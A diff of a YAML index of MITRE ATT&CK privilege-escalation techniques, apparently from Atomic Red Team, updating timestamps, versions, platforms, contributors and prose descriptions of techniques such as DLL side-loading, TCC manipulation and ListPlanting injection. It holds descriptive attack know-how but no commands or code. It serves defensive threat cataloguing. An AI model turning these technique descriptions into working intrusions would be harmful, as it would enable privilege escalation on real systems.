-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -26513,7 +26813,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -26557,7 +26856,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -26579,7 +26878,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -26660,7 +26958,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -26683,7 +26980,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -26713,12 +27010,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -26803,7 +27098,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -26868,7 +27162,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -26943,7 +27236,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -26971,7 +27264,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -27002,7 +27294,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -27045,12 +27337,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -27067,7 +27357,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -27126,7 +27416,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -27208,7 +27497,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -27255,7 +27543,7 @@ privilege-escalation:
           '
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -27352,7 +27640,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -27466,7 +27753,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests:
     - name: Create Systemd Service
@@ -27690,7 +27976,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -27718,7 +28003,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -27762,8 +28047,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -27799,7 +28082,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -27818,12 +28101,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -27873,12 +28155,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -27911,9 +28192,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -27930,9 +28212,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -27978,38 +28259,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -28017,6 +28279,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -28024,7 +28288,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -28054,7 +28318,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -28100,7 +28363,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -28145,8 +28408,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -28172,7 +28433,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -28198,59 +28459,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -28267,6 +28497,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -28281,21 +28514,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -28340,9 +28604,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -28399,8 +28662,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -28409,7 +28672,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -28451,7 +28713,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -28476,12 +28738,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -28521,8 +28782,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -28530,13 +28793,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -28567,17 +28830,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -28640,7 +28900,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -28674,8 +28934,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
